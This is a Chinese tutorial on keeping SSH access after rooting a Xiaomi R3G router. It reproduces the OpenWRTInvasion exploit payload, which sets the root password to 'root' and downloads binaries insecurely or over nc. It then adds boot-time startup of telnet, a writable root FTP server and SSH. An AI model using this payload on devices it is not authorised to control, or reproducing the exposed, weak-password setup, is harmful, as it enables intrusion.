小米路由器R3G稳定2.28.44 固化SSH
1.SSH
参考恩山论坛的帖子SSH即可
[R3G] R3G 和 R3GV2 解锁 SSH
我做了实验 R3G稳定2.28.44 是可以一键SSH的。
2.固化SSH
帖子中SSH所使用的本质是OpenWRTInvasion
原理是通过小米路由器的Root shell漏洞上传二进制文件进而获取SSH及root
但是所有的二进制文件全部上传于/tmp目录下,而小米路由器在每次重启后都会重置该目录,也就是说重启便会丢失SSH。
当然OpenWRTInvasion项目本来就是通过获取SSH进而刷写不死鸟然后刷到OpenWRT的。
让我们看下相关执行脚本
#!/bin/ash
set -euo pipefail
exploit() {
setup_password
setup_busybox
start_telnet
start_ftp
start_ssh
echo "Done exploiting"
}
download_file_from_github() {
# Rationale for using --insecure: https://github.com/acecilia/OpenWRTInvasion/issues/31#issuecomment-690755250
curl -L "https://github.com/acecilia/OpenWRTInvasion/raw/master/script_tools/$1" --insecure --output "$2"
}
download_file_from_tcp_server() {
echo "$1" | nc "${REMOTE_ADDR}" "${QUERY_STRING}" >"$2"
}
get_file() {
src_file="$1"
dst_file="$2"
rm -rf "${dst_file}"
port="${QUERY_STRING}"
if [ x"${port}" = x0 ]; then
download_file_from_github "${src_file}" "${dst_file}"
else
download_file_from_tcp_server "${src_file}" "${dst_file}"
fi
}
setup_password() {
# Override existing password, as the default one set by xiaomi is unknown
# https://www.systutorials.com/changing-linux-users-password-in-one-command-line/
echo -e "root\nroot" | passwd root
}
setup_busybox() {
# kill/stop telnet, in case it is running from a previous execution
pgrep busybox | xargs kill || true
cd /tmp
get_file busybox-mipsel busybox
chmod +x busybox
}
start_ftp() {
cd /tmp
ln -sfn busybox ftpd # Create symlink needed for running ftpd
./busybox tcpsvd -vE 0.0.0.0 21 ./ftpd -Sw / >> /tmp/messages 2>&1 &
}
start_telnet() {
cd /tmp
./busybox telnetd
}
start_ssh() {
cd /tmp
# Clean
rm -rf dropbear
rm -rf /etc/dropbear
# kill/stop dropbear, in case it is running from a previous execution
pgrep dropbear | xargs kill || true
# Donwload dropbear static mipsel binary
get_file dropbearStaticMipsel.tar.bz2 dropbear.tar.bz2
mkdir dropbear
/tmp/busybox tar xvfj dropbear.tar.bz2 -C dropbear --strip-components=1
# Add keys
# http://www.ibiblio.org/elemental/howto/dropbear-ssh.html
mkdir -p /etc/dropbear
cd /etc/dropbear
/tmp/dropbear/dropbearkey -t rsa -f dropbear_rsa_host_key
/tmp/dropbear/dropbearkey -t dss -f dropbear_dss_host_key
# Start SSH server
/tmp/dropbear/dropbear
# https://unix.stackexchange.com/a/402749
# Login with ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc root@192.168.0.21
}
remount() {
echo "Remount /usr/share/xiaoqiang as read-write"
cp -R /usr/share/xiaoqiang /tmp/xiaoqiang
mount --bind /tmp/xiaoqiang /usr/share/xiaoqiang
echo "Done remounting"
}
# Function inspired by https://openwrt.org/docs/guide-user/installation/generic.backup#create_full_mtd_backup
mtd_backup() {
TMPDIR="/tmp"
BACKUP_DIR="${TMPDIR}/mtd_backup"
OUTPUT_FILE="${TMPDIR}/mtd_backup.tgz"
# Start
echo "Start"
rm -rf "${BACKUP_DIR}"
mkdir -p "${BACKUP_DIR}"
# List remote mtd devices from /proc/mtd. The first line is just a table
# header, so skip it (using tail)
cat /proc/mtd | tail -n+2 | while read; do
MTD_DEV=$(echo ${REPLY} | cut -f1 -d:)
MTD_NAME=$(echo ${REPLY} | cut -f2 -d\")
echo "Backing up ${MTD_DEV} (${MTD_NAME})"
dd if="/dev/${MTD_DEV}" of="${BACKUP_DIR}/${MTD_DEV}_${MTD_NAME}.bin"
done
# Do not compress, as the device runs out of storage for such operation
echo "Done backing up"
}
# From https://stackoverflow.com/a/16159057
"$@"
可以看到相关二进制全部存放于/tmp目录中,想要固化,本质上就是拷贝到其他目录
1.查看目录解构,选择存放目录
df -h
最终选择存放到/userdisk目录下
2.拷贝dropbear[用于提供ssh]
cp -r /tmp/dropbear/ /userdisk/dropbear/
3.拷贝busybox工具箱
mkdir -p /userdisk/busybox
cp /tmp/busybox /userdisk/busybox/
4.添加启动引导
编辑/etc/rc.local
文件 添加开机执行脚本文件
需要注意在exit 0
之前添加
#ssh支持
/userdisk/dropbear/dropbear
#ftpd支持
ln -sfn /userdisk/busybox/busybox /tmp/ftpd
/userdisk/busybox/busybox tcpsvd -vE 0.0.0.0 21 /tmp/ftpd -Sw / >> /tmp/messages 2>&1 &
#telnetd支持
/userdisk/busybox/busybox telnetd
完整文件如下:
# restore phy config
speed=$(uci -q get xiaoqiang.common.WAN_SPEED)
[ -n "$speed" ] && /usr/sbin/phyhelper swan "$speed"
/userdisk/dropbear/dropbear
ln -sfn /userdisk/busybox/busybox /tmp/ftpd
/userdisk/busybox/busybox tcpsvd -vE 0.0.0.0 21 /tmp/ftpd -Sw / >> /tmp/messages 2>&1 &
/userdisk/busybox/busybox telnetd
exit 0
3.修改路由器 Banner[非必须]
1.生成
生成地址:http://patorjk.com/software/taag/#p=display&f=Big Money-ne&t=ARE U OK
2.修改
R3G的Banner文件位于/etc/banner